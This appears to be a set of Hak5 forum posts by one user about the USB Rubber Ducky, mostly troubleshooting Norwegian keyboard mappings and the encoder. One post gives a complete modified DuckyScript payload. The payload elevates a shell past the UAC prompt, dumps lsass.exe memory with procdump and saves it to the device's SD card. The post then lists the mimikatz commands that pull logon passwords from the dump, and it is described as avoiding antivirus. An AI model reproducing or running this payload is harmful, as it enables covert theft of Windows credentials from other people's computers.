Hackman1970

Executing 'which sslstrip': /usr/bin/sslstrip Got it working now, had to factory reset, then install SSLStrip from large tile and then I repeated steps for twisted web :-)

Ordered mine at 10/13/2013 and it arrived my home in Norway yesterday. Looking forward to play with it :D

This worked for me. I can now start sslstrip from console :) , but it still says not installed in web interface...

To find out if more keys have problems with no.properties I made a script with all norwegian keys: REM *** Testscript for norwegian keyboards *** REM *** Author: Hackman1970 REM *** Editor: LeafPad REM *** Character Coding UTF-8 REM *** Wait for detection of RubberDucky DELAY 2000 GUI-R STRING notepad DELAY 500 STRING ROW 1 OPEN : |1234567890+\ ENTER STRING ROW 1 SHIFT : §!"#¤%&/()=?` ENTER STRING ROW 1 ALTGR : @£$ {[]}±' ENTER ENTER STRING ROW 2 OPEN : qwertyuiopå" ENTER STRING ROW 2 SHIFT : QWERTYUIOPÅ^ ENTER STRING ROW 2 ALTGR : ¦ € ~ ENTER ENTER STRING ROW 3 OPEN : asdfghjkløæ' ENTER STRING ROW 3 SHIFT : ASDFGHJKLØÆ* ENTER ENTER STRING ROW 4 OPEN : <zxcvbnm,.- ENTER STRING ROW 4 SHIFT : >ZXCVBNM;:_ ENTER STRING ROW 4 ALTGR : ½ ENTER Heres the encoders output: root@kali-vb:/media/DUCKY# java -jar encoder.jar -l no.properties -i nbno_keys_UTF-8.txt -o inject.bin Hak5 Duck Encoder 2.6 Loading File ..... [ OK ] Loading Keyboard File ..... [ OK ] Loading Language File ..... [ OK ] Loading DuckyScript ..... [ OK ] Char not found:ASCII_9 Char not found:ASCII_9 Char not found:ASCII_60 Char not found:ASCII_9 Char not found:ISO_8859_1_B1 Char not found:ASCII_9 Char not found:ASCII_9 Char not found:ASCII_5E Char not found:ASCII_9 Char not found:ISO_8859_1_A6 Char not found:ASCII_9 Char not found:ASCII_9 Char not found:ASCII_9 Char not found:ASCII_9 Char not found:ASCII_9 DuckyScript Complete..... [ OK ] root@kali-vb:/media/DUCKY# here is the output: ROW 1 OPEN : |1234567890+\ OK ROW 1 SHIFT : §!"#¤%&/()=? MISSING ` = ( \ + SHIFT + SPACE ) ROW 1 ALTGR : @£$ {[]}' OK ROW 2 OPEN : qwertyuiopå" OK ROW 2 SHIFT : QWERTYUIOPÅ MISSING ^ = ( ¨ + SHIFT + SPACE ) ROW 2 ALTGR : € ~ OK ROW 3 OPEN : asdfghjkløæ' OK ROW 3 SHIFT : ASDFGHJKLØÆ* OK ROW 4 OPEN : <zxcvbnm,.- OK ROW 4 SHIFT : >ZXCVBNM;:_ OK ROW 2 ALTGR : | HAS CHANGED KEY

Char not found:ASCII_5E in no.properties For norwegian, this did not do the trick either: //ASCII_5E = KEY_RIGHT_BRACE, MODIFIERKEY_SHIFT + KEY_SPACE // 94 ^ neither //ASCII_5E = DIAERESIS_BITS, MODIFIERKEY_SHIFT + KEY_SPACE // 94 ^ In US keymap your key } is on same place as our ^ Here is my output: root@kali-vb:/media/DUCKY# java -jar encoder.jar -l no.properties -i inject.txt -o inject.bin Hak5 Duck Encoder 2.6 Loading File ..... [ OK ] Loading Keyboard File ..... [ OK ] Loading Language File ..... [ OK ] Loading DuckyScript ..... [ OK ] Char not found:ASCII_5E Char not found:ASCII_5E DuckyScript Complete..... [ OK ]

Hello I got my RubberDucky some days ago and have tested a bit in norwegian. I ran into problems with ASCII_5E when this key ^ is in the script. Else I have not seen anything wrong yet... After som testing with no.properties I gave that up for now. This did not work: //ASCII_5E = CIRCUMFLEX_BITS, MODIFIERKEY_SHIFT + KEY_SPACE // 94 ^ Instead I tried to circumvent the problem, thinking the other way around: Change "victims" keyboard to US english. In this post: https://forums.hak5.org/index.php?/topic/30210-payload-memory-dump-windows-recover-password-without-setting-off-av/ I have made a comment at bottom of page on how to do this until no.properties have been fixed.

About this key ^ for norwegian, swedish and dannish, you may want to look at this post, se my comment at bottom of page: https://forums.hak5.org/index.php?/topic/30210-payload-memory-dump-windows-recover-password-without-setting-off-av/

I had problems with norwegian keybords and this key ^ so I did som changes in the code to make it work in norwegian. First i tried fixing no.properties for //ASCII_5E = CIRCUMFLEX_BITS, MODIFIERKEY_SHIFT + KEY_SPACE, did not work for me. Instead of using no.properties I use US standard and make computer change from norwegian to us english. Have tested this on my Norwegian Windows 7 x64, worked perfect for me :) Probably the way to go insted of dk.properties an se.properties to? Check out my modified code: REM Author: Hak5Darren with the help of: REM @gentilkiwi, @Mubix, redmeatuk, shutin, DyFukA, Microsoft, Sysinternals, 7zip REM REM Modified to circumvent norwegian keyboards by Hackman1970 REM REM Description: "Backup" Windows Passwords without setting off AntiVirus REM Dumps memory of lsass.exe using Microsoft Sysinternals util ProcDump REM Passwords can be later be extracted using mimikatz. REM REM Firmware: Use c_duck_v2.1.hex firmware (Twin Duck) to execute from SD REM card labeled "DUCKY" and save log file as %COMPUTERNAME%_lsass.dmp REM Include procdump.exe on root of DUCKY SD card. Download ProcDump from: REM http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx REM REM Include 7za.exe on root of DUCKY SD card. Download 7zip command line version from: REM http://www.7-zip.org/download.html REM REM Target: Windows Vista/7/8, Win32/x64 REM *** UAC Bypass *** DELAY 2000 WINDOWS r REM *** Input Lanugage Swap to circumvent problmes with norwegian REM *** Norwegian Windows 7 use to have US english as second language installed by default REM *** Using shortcut ALT-SHIFT to troggle between NO and US ALT-SHIFT DELAY 200 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 500 REM *** For norwegian I tried to change y[es] to j[a] REM ALT y REM ALT j REM *** The abowe did not work but LEFTARROW ENTER works :) LEFTARROW ENTER DELAY 500 REM *** Swap Input Lanugage again for cmd.exe shell ALT-SHIFT DELAY 200 REM *** Define DUCKY drive as %duck% ENTER STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d ENTER DELAY 500 REM *** Execute procdump from SD card, Save dump to %temp%, Compress dump with 7zip from SD card, Send archive to SD card, Delete dump from %temp%, Exit *** STRING %duck%\procdump.exe -accepteula -ma lsass.exe %temp%\%COMPUTERNAME%_lsass.dmp & %duck%\7za.exe a -t7z -mx9 "%duck%\%COMPUTERNAME%_lsass.7z" "%temp%\%COMPUTERNAME%_lsass.dmp" & del %temp%\%COMPUTERNAME%_lsass.dmp & exit ENTER REM *** Swap Input Lanugage again hopefully back to norwegian ALT-SHIFT REM *** Post Exploitation *** REM From your PC copy the %COMPUTERNAME%_lsass.dmp off the DUCKY SD card to a REM directory including the version of mimikatz for your targets architecture REM (NT5 win32, NT5 x64, NT6 win32 or NT6 x64) and run the following commands REM (I had to use the one from \mimikatz\alpha\x64 for my Windows 7 x64 box:) REM mimikatz.exe <enter> REM sekurlsa::minidump %COMPUTERNAME%_lsass.dmp <enter> REM sekurlsa::logonPasswords full <enter> Is this the way to go or have anyone fix for no.properties?

Char not found:ASCII_5E in no.properties I have tried this in no.properties without any luck: //ASCII_5E = CIRCUMFLEX_BITS, MODIFIERKEY_SHIFT + KEY_SPACE // 94 ^ On my keyborad this key lives upper left side of the ENTER-key and it looks like this: ------- | ^ | | ~ | | ¨ | ------- I have to press SHIFT + ABOVE KEY + SPACE to get the letter ^,is there someone out there that can give me a hint?